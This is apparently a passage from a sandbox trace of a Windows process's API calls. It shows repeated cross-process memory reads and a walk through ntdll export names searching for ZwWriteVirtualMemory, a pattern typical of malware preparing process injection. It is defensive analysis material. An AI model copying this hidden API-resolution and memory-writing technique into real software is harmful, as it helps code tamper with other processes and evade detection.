NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.131] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdd000, Buffer=0x7ffb, BufferSize=0xb6d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.131] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bde000, Buffer=0x7ffb, BufferSize=0xb6e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.132] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bdf000, Buffer=0x7ffb, BufferSize=0xb6f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.132] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be0000, Buffer=0x7ffb, BufferSize=0xb70000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.132] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be1000, Buffer=0x7ffb, BufferSize=0xb71000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be2000, Buffer=0x7ffb, BufferSize=0xb72000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be3000, Buffer=0x7ffb, BufferSize=0xb73000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be4000, Buffer=0x7ffb, BufferSize=0xb74000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.133] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be5000, Buffer=0x7ffb, BufferSize=0xb75000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be6000, Buffer=0x7ffb, BufferSize=0xb76000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be7000, Buffer=0x7ffb, BufferSize=0xb77000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.134] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be8000, Buffer=0x7ffb, BufferSize=0xb78000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28be9000, Buffer=0x7ffb, BufferSize=0xb79000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bea000, Buffer=0x7ffb, BufferSize=0xb7a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28beb000, Buffer=0x7ffb, BufferSize=0xb7b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.135] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28bec000, Buffer=0x7ffb, BufferSize=0xb7c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0136.265] lstrcmpA (lpString1="A_SHAFinal", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="A_SHAInit", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="A_SHAUpdate", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0136.265] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrCaptureMessageMultiUnicodeStringsInPlace", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrCaptureMessageString", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrCaptureTimeout", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrClientCallServer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrClientConnectToServer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrFreeCaptureBuffer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrGetProcessId", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrIdentifyAlertableThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrSetPriorityClass", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="CsrVerifyRegion", lpString2="ZwWriteVirtualMemory") returned -1 [0136.266] lstrcmpA (lpString1="DbgBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgPrint", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgPrintEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgPrintReturnControlC", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgPrompt", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgQueryDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgSetDebugFilterState", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgUiConnectToDbg", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgUiContinue", lpString2="ZwWriteVirtualMemory") returned -1 [0136.267] lstrcmpA (lpString1="DbgUiConvertStateChangeStructure", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiConvertStateChangeStructureEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiDebugActiveProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiGetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiIssueRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiRemoteBreakin", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiSetThreadDebugObject", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiStopDebugging", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUiWaitStateChange", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="DbgUserBreakPoint", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwCreateTraceInstanceId", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwDeliverDataBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEnumerateProcessRegGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventActivityIdControl", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventProviderEnabled", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventSetInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWrite", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWriteEndScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWriteEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWriteFull", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWriteNoRegistration", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWriteStartScenario", lpString2="ZwWriteVirtualMemory") returned -1 [0136.268] lstrcmpA (lpString1="EtwEventWriteString", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwEventWriteTransfer", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwGetTraceEnableFlags", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwGetTraceEnableLevel", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwGetTraceLoggerHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwLogTraceEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwNotificationRegister", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwNotificationUnregister", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwProcessPrivateLoggerRequest", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwRegisterSecurityProvider", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwRegisterTraceGuidsA", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwRegisterTraceGuidsW", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwReplyNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwSendNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwSetMark", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwTraceEventInstance", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwTraceMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwTraceMessageVa", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwUnregisterTraceGuids", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwWriteUMSecurityEvent", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwpCreateEtwThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.269] lstrcmpA (lpString1="EtwpGetCpuSpeed", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="EvtIntReportAuthzEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="EvtIntReportEventAndSourceAsync", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="ExpInterlockedPopEntrySListEnd", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="ExpInterlockedPopEntrySListFault", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="ExpInterlockedPopEntrySListResume", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="KiRaiseUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="KiUserApcDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="KiUserCallbackDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="KiUserExceptionDispatcher", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="KiUserInvertedFunctionTable", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrAccessResource", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrAddDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrAddLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrAddRefDll", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrAppxHandleIntegrityFailure", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrDisableThreadCalloutsForDll", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrEnumResources", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrEnumerateLoadedModules", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrFastFailInLoaderCallout", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrFindEntryForAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrFindResourceDirectory_U", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrFindResourceEx_U", lpString2="ZwWriteVirtualMemory") returned -1 [0136.270] lstrcmpA (lpString1="LdrFindResource_U", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrFlushAlternateResourceModules", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllFullName", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllHandleByMapping", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllHandleByName", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllHandleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetDllPath", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetFailureData", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetFileNameFromLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetKnownDllSectionHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetProcedureAddress", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetProcedureAddressEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrGetProcedureAddressForCaller", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrInitShimEngineDynamic", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrInitializeThunk", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrLoadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrLoadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrLoadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrLockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrOpenImageFileOptionsKey", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrProcessInitializationComplete", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrProcessRelocationBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrProcessRelocationBlockEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0136.271] lstrcmpA (lpString1="LdrQueryImageFileExecutionOptionsEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrQueryImageFileKeyOption", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrQueryModuleServiceTags", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrQueryOptionalDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrQueryProcessModuleInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrRegisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrRemoveDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrRemoveLoadAsDataTable", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResFindResource", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResFindResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResGetRCConfig", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResRelease", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResSearchResource", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResolveDelayLoadedAPI", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrResolveDelayLoadsFromDll", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrRscIsTypeExist", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrSetAppCompatDllRedirectionCallback", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrSetDefaultDllDirectories", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrSetDllDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrSetDllManifestProber", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrSetImplicitPathOptions", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrSetMUICacheType", lpString2="ZwWriteVirtualMemory") returned -1 [0136.272] lstrcmpA (lpString1="LdrShutdownProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrShutdownThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrStandardizeSystemPath", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrSystemDllInitBlock", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrUnloadAlternateResourceModule", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrUnloadAlternateResourceModuleEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrUnloadDll", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrUnlockLoaderLock", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrUnregisterDllNotification", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksum", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrVerifyImageMatchesChecksumEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrpResGetMappingSize", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="LdrpResGetResourceDirectory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="MD4Final", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="MD4Init", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="MD4Update", lpString2="ZwWriteVirtualMemory") returned -1 [0136.273] lstrcmpA (lpString1="MD5Final", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="MD5Init", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="MD5Update", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NlsAnsiCodePage", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NlsMbCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NlsMbOemCodePageTag", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheck", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheckAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheckByType", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheckByTypeAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheckByTypeResultList", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarm", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAccessCheckByTypeResultListAndAuditAlarmByHandle", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAddAtom", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAddAtomEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAddBootEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAddDriverEntry", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAdjustGroupsToken", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAdjustPrivilegesToken", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAdjustTokenClaimsAndDeviceGroups", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAlertResumeThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAlertThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.274] lstrcmpA (lpString1="NtAlertThreadByThreadId", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAllocateLocallyUniqueId", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAllocateReserveObject", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAllocateUserPhysicalPages", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAllocateUuids", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAllocateVirtualMemory", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcAcceptConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcCancelMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcConnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcConnectPortEx", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcCreatePort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcCreatePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcCreateResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcCreateSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcCreateSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcDeletePortSection", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcDeleteResourceReserve", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcDeleteSectionView", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcDeleteSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcDisconnectPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcImpersonateClientContainerOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcImpersonateClientOfPort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcOpenSenderProcess", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcOpenSenderThread", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcQueryInformation", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcQueryInformationMessage", lpString2="ZwWriteVirtualMemory") returned -1 [0136.275] lstrcmpA (lpString1="NtAlpcRevokeSecurityContext", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] lstrcmpA (lpString1="NtAlpcSendWaitReceivePort", lpString2="ZwWriteVirtualMemory") returned -1 [0136.276] 